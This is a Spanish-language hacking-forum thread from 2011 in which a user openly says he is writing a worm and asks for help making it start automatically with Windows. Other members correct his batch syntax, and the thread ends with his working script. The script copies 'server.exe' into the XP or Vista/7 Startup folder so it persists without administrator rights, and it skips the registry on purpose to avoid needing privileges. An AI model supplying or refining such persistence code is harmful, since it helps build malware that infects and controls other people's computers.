elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Pequeña duda en batch [solucionado!!!!] :D
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Pequeña duda en batch [solucionado!!!!] :D  (Leído 4,178 veces)
roilivethelife

Desconectado Desconectado

Mensajes: 54


Ver Perfil
Pequeña duda en batch [solucionado!!!!] :D
« en: 2 Noviembre 2011, 20:43 pm »

Hola!
Estoy programando un worm, pero me falla una parte vital, que es la de autoarranque con windows.
Tengo este codigo pero me da "error de sintaxis"
Código:
@echo off
REM esta carpeta vale si es windows xp solo
copy /Y server.exe %homedrive%\Documents and Settings\%username%\Menú inicio\Programas\Inicio
(Hay un archivo llamado server.exe donde se ejecuta el bat y la carpeta a donde quiero copiar existe)

y otra preguntita si no es mucho pedir:
como hacer desde batch, saber si un sistema es windows xp o vista/7

gracias!


« Última modificación: 3 Noviembre 2011, 20:58 pm por roilivethelife » En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Pequeña duda en batch
« Respuesta #1 en: 2 Noviembre 2011, 21:04 pm »

Para que arranque desde windows, busca en google como agregar una entrada en el registro de windows para inciar con windows desde batch.

Y porque usas 2 variables de entorno pudiendo usar %userprofile%


En línea

2Fac3R


Desconectado Desconectado

Mensajes: 300


Why be a king when you can be a god


Ver Perfil WWW
Re: Pequeña duda en batch
« Respuesta #2 en: 3 Noviembre 2011, 01:09 am »

Como te dicen, es incorrecto usar 2 variables de entorno.

http://www.google.com.mx/search?aq=f&gcx=w&sourceid=chrome&ie=UTF-8&q=iniciar+programa+con+windows

Zalu2
En línea

Escuela de Hackers & Programación. http://ihackndev.blogspot.com/
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.709



Ver Perfil
Re: Pequeña duda en batch
« Respuesta #3 en: 3 Noviembre 2011, 01:40 am »

Lo que nadie te ha dicho es que aunque uses solamente %Userprofile% ese código te va a seguir dando error...

1º - Usa comillas dobles en nombres con espacios.

2º - Usa el nombre "real" en inglés, el mismo que sale al abrir la consola.

3º - Leete un manual básico...

Código
  1. copy /Y "server.exe" "%homedrive%\Documents and Settings\%username%\Start menu\Programs\Start\"

Para saber que windows usa, es tan fácil como esto:

Código
  1. systeminfo | find "Nombre del sistema"

Saludos.
En línea


roilivethelife

Desconectado Desconectado

Mensajes: 54


Ver Perfil
Re: Pequeña duda en batch
« Respuesta #4 en: 3 Noviembre 2011, 16:10 pm »

Citar
Para que arranque desde windows, busca en google como agregar una entrada en el registro de windows para inciar con windows desde batch
No quiero añadir nada al registro porque necesitas privilegios. De mi manera funcionaría en cualquier ordenador, bastaria con saber si es xp o w7 y copiar el programa a la carpeta de inicio.

Citar
Y porque usas 2 variables de entorno pudiendo usar %userprofile%
porque estaba desesperado probando de todas formas posibles y no me iba


Citar
1º - Usa comillas dobles en nombres con espacios.
ok

Citar
2º - Usa el nombre "real" en inglés, el mismo que sale al abrir la consola.
en la consola aparece esto TAL CUAL cuando estoy en la carpeta
Código:
C:\Documents and Settings\nombreusuario\Menú Inicio\Programas\Inicio>

Citar
Código

copy /Y "server.exe" "%homedrive%\Documents and Settings\%username%\Start menu\Programs\Start\"

me dá error de ruta especificada no hallada...
Tambien probé con el nombre en español y me da el mismo error, creo que es fallo de la tilde.
alguna solucion?

si kereis probarlo en w7 la carpeta es
“%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu"

gracias!
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.709



Ver Perfil
Re: Pequeña duda en batch
« Respuesta #5 en: 3 Noviembre 2011, 16:46 pm »

el problema es que no tengo delante XP xDDD, en win7 sale la ruta del cmd en inglés xD

De todas formas el código tiene que ir por cojones, lo que no se es si habré puesto la ruta mal, pero ¿Estás seguro de que existe la carpeta "START"?

Código
  1. @echo off
  2. mkdir "%userprofile%\Start menu\Programs\Start\"
  3. copy /Y "server.exe" "%userprofile%\Start menu\Programs\Start\"

PD: no se si habré puesto la ruta como es, no tengo el xp aqui.

Saludos.
En línea


roilivethelife

Desconectado Desconectado

Mensajes: 54


Ver Perfil
Re: Pequeña duda en batch
« Respuesta #6 en: 3 Noviembre 2011, 20:57 pm »

el problema es que no tengo delante XP xDDD, en win7 sale la ruta del cmd en inglés xD

De todas formas el código tiene que ir por cojones, lo que no se es si habré puesto la ruta mal, pero ¿Estás seguro de que existe la carpeta "START"?

Código
  1. @echo off
  2. mkdir "%userprofile%\Start menu\Programs\Start\"
  3. copy /Y "server.exe" "%userprofile%\Start menu\Programs\Start\"

PD: no se si habré puesto la ruta como es, no tengo el xp aqui.

Saludos.

Ya he encontrado el fallo, por cierto, he probado tu código y me crea las carpetas en ingles xD
El problema está en el uso de la tilde, he mirado en este post: http://foro.elhacker.net/scripting/acentos_en_un_bat-t174987.0.html

Basicamente lo que dice es que usemos el editor de ms-dos ejecutando "edit"

Pones las tildes, guardas y perfecto!
Ya lo he solucionado, funciona 100%
Mi codigo de inicio automatico sin tener privilegios administrativo:
Código:
@echo off
REM Comprobando si es xp...
IF EXIST "%userprofile%\Men£ Inicio\Programas\Inicio\" copy /Y "server.exe" "%userprofile%\Men£ Inicio\Programas\Inicio\"

REM Comprobando si es vista o w7
IF EXIST "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup" copy /Y "server.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Pause
Le añadiré alguna mejora pero por el momento me sirve de sobra.

GRacias a todos por responder, especialmete a EleKtro H@cker
« Última modificación: 3 Noviembre 2011, 21:13 pm por roilivethelife » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Una pequeña duda....
Grabadoras
Viequense 3 1,194 Último mensaje 3 Agosto 2004, 08:41 am
por Luis_Kano
;D Pequeña duda
Fotografía
RastonE 3 2,843 Último mensaje 13 Octubre 2005, 21:20 pm
por Morris
Pequeña duda con un comando batch (NUEVA DUDA RELACIONADA)
Scripting
revenge1252 9 7,786 Último mensaje 13 Febrero 2008, 21:41 pm
por revenge1252
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines